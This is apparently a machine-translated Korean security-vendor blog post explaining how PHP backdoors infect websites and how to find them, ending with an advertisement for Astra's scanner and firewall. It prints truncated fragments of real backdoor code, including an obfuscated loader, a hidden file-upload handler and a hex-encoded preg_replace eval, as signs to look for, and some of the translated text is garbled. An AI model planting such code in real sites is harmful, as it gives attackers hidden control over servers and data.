매일 100만 개 이상의 웹사이트가 해킹당하고 있습니다. 웹사이트가 한 번 손상되면 다시 해킹될 확률이 40%로 알려져 있습니다. 해커는 종종 웹 사이트에 다시 액세스할 수 있는 악성 코드(PHP 백도어)를 남깁니다. 이 맬웨어는 제거하기가 매우 어렵기 때문에 전체 관리자 패널을 재설정하더라도 이러한 코드는 여전히 웹사이트 깊숙이 숨겨져 있습니다. 이러한 코드는 웹사이트에 우회 액세스를 허용하기 때문에 "백도어"라고 합니다. 오늘날 WordPress, Magneto 등과 같은 많은 인기 있는 CMS는 PHP에서 실행됩니다. 서버 측 스크립팅 언어. 오늘날 웹사이트의 80% 이상에서 PHP를 사용하기 때문입니다. PHP 백도어가 주요 해킹 위협이 되었습니다.
PHP 백도어란 무엇입니까?
PHP 백도어는 웹사이트를 비밀리에 감염시키고 해커에게 인증 우회를 제공하도록 설계된 악성 코드 스크립트 또는 프로그램입니다. 백도어는 웹사이트에 대한 액세스를 유지하고, 맬웨어를 주입하고, 데이터를 스크랩하고, 카드 스키머를 삽입하고, 금융 데이터를 훔치는 등의 작업에 사용될 수 있습니다.
PHP 웹 셸을 사용하면 공격자가 PHP 서버를 원격으로 관리하고 실행할 수도 있습니다. 공격자는 인터넷의 URL을 사용하여 관리자 패널에 액세스할 수 있습니다. 더 복잡한 백도어는 코어 메모리에 직접 액세스하여 웹사이트의 데이터를 악용할 수도 있습니다.
PHP 백도어는 지속성을 유지하도록 설계되었습니다. 웹 사이트를 철저히 정리한 후에도 계속해서 나타나도록 설계되었습니다. 따라서 백도어를 제거하는 것은 매우 어렵습니다.
웹사이트에서 PHP 백도어 감지:
PHP 백도어의 힘은 매우 방대합니다. 해커가 웹 사이트에서 작은 명령을 실행하여 공격자가 웹 사이트 트래픽을 악용하고 리디렉션할 수 있도록 허용합니다. 이러한 백도어는 권한 이상을 확대하도록 설계되었습니다. PHP 백도어를 사용하여 해커는 다음을 침입할 수 있습니다.
- 서버에 있는 모든 유형의 데이터에 액세스합니다.
- 귀하의 서버를 사용하여 암호화폐를 채굴할 수 있습니다.
- 서버를 공격자의 지시에 따라 대량의 스팸을 차단하는 봇으로 전환할 수 있습니다.
그리고 더 많은 악!
웹사이트에서 PHP 백도어 감지:
모든 웹사이트 소유자가 예리한 기술 지식을 가지고 있는 것은 아닙니다. 사이트 소유자는 분명히 징후가 나타나기 시작할 때까지 웹사이트에 백도어 또는 기타 인증되지 않은 코드의 존재를 인식하지 못할 가능성이 높습니다.
따라서 웹 사이트 소유자는 이러한 백도어를 추적하고 제거하는 데 도움을 주는 Astra와 같은 회사에 연락합니다. 이러한 악성 코드는 코드가 난독화되어 식별하기가 훨씬 더 복잡하기 때문에 찾기가 어렵습니다.
또한 웹 사이트를 대상으로 하는 모든 백도어가 비슷하게 보이는 것은 아닙니다. 따라서 백도어 중 하나를 찾으면 쉴 수 없으며 더 깊이 파고들 필요가 있음을 의미합니다. PHP 백도어가 웹사이트에서 숨길 수 있는 방법에는 여러 가지가 있습니다. 그러나 이 감염을 허용하는 몇 가지 일반적인 보안 문제는 다음과 같습니다.
- 약하거나 기본 비밀번호입니다.
- 무제한 PHP 파일 업로드
- 무효화된 입력을 허용하는 PHP 사이트의 잘못된 코딩
- 오래된 PHP 버전입니다.
- 부적절한 PHP 구성.
- 민감한 파일의 약한 파일 권한
- 부적절한 오류 보고 및 코드 공개.
웹사이트에서 PHP 백도어 제거
이러한 백도어를 제거하기 위한 첫 번째 단계는 이 악성코드의 위치를 감지하는 것입니다. 백도어를 제거하려면 무단 액세스를 허용한 초기 코드를 찾아 해당 코드를 제거해야 합니다. 따라서 귀하의 사이트를 운영하는 코드에 대한 이해가 매우 중요합니다. 다음은 PHP 백도어를 담당할 수 있는 파일 및 코드 목록입니다.
불량 파일 백도어
백도어가 악성 파일로 발견되는 경우가 많습니다. 그러나 이러한 파일은 핵심 플러그인, 테마 또는 콘텐츠 관리 시스템의 일부가 아닙니다. 그러나 다른 코어 파일과 유사한 이름을 가지고 있습니다. 따라서 쉽게 교체할 수 있습니다. 악성 파일의 코드는 다음과 같이 시작할 수 있습니다.
$t43="l/T6\\:aAcNLn#?rP}1\rG_ -s`SZ\$58t\n7E{.*]ixy3h,COKR2dW[0!U\tuQIHf4bYm>wFz<admin@wsxdn.com&(BjX'~|ge%p+oMJv^);\"k9";$GLOBALS['ofmhl60'] = ${$t43[20].$t43백도어 플러그인 및 테마
여러 플러그인과 테마는 작업 중인 CMS와 상관없이 가장 많이 사용되는 기능 중 하나입니다. 악성 플러그인 파일은 파일 관리자나 FTP를 통해서만 파일 시스템에서 볼 수 있습니다. 해커는 일반적으로 사용되는 많은 플러그인에 PHP 백도어를 도입합니다. 일반적으로 다음과 같은 이름으로 사용됩니다.
- 워드프레스 지원
- 로그인 월
- WP 집
- WP 기반-SEO
따라서 설치 당시에는 정상처럼 보일 수 있는 플러그인이 실제로는 백도어 코드가 있는 파일임이 분명합니다. 따라서 소유자는 이러한 사실을 모르고 백도어가 포함된 이러한 파일을 설치합니다. 한 가지 예로 WordPress Sketch 테마는 그 안에 수많은 백도어 파일과 함께 업로드된 인기 있는 악성코드가 포함된 테마였습니다. 이러한 설치를 방지하는 유일한 안전한 방법은 인식하지 못하는 모든 테마 또는 플러그인을 제거하는 것입니다.
코어 파일 백도어 삽입
웹사이트 호스트의 핵심 파일에도 PHP 백도어가 삽입될 수 있습니다. 멀웨어는 파일의 시작 부분이나 끝 부분에서 찾을 수 있습니다. 그러나 해커가 정말로 데이터의 핵심을 파괴하고 싶다면 코드 사이에 설치하려고 시도할 것입니다.
다음은 이러한 코드의 몇 가지 예입니다.
처음에 찾은 코드:
다음은 또 다른 예입니다.
@ini_set('display_errors','off');@ini_set('log_errors',0);@ini_set('error_log',NULL); error_reporting(0); @ini_set('set_time_limit',0);ignore_user_abort(true);if(@isset($_POST['size']) and @isset($_FILES['img']['name'])) {@ini_set('upload_max_filesize','1000000');$size=$_POST['size'];$open_image=$_FILES['img']['name']; $open_image_tmp=$_FILES['img']['tmp_name'];$image_tmp=$size.$open_image; @move_uploaded_file($open_image_tmp,$image_tmp);다른 백도어는 매우 난독화되어 다음과 같이 시작할 수 있습니다.
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\종종 백도어 파일 내의 어딘가에 FilesMan에 대한 참조가 있을 것입니다.
$default_action = "FilesMan";함께 사이버 범죄에 맞서자
Astra의 머신 러닝 기반 자동 악성 코드 스캐너는 클릭 한 번으로 수많은 PHP 백도어와 악성 코드를 탐지합니다. 반면 Astra 방화벽은 악성 트래픽이 있는지 웹사이트를 24*7 모니터링하고 다가오는 모든 보안 위협을 차단합니다. 필요에 따라 요금제를 선택하고 지금 보안을 유지하십시오!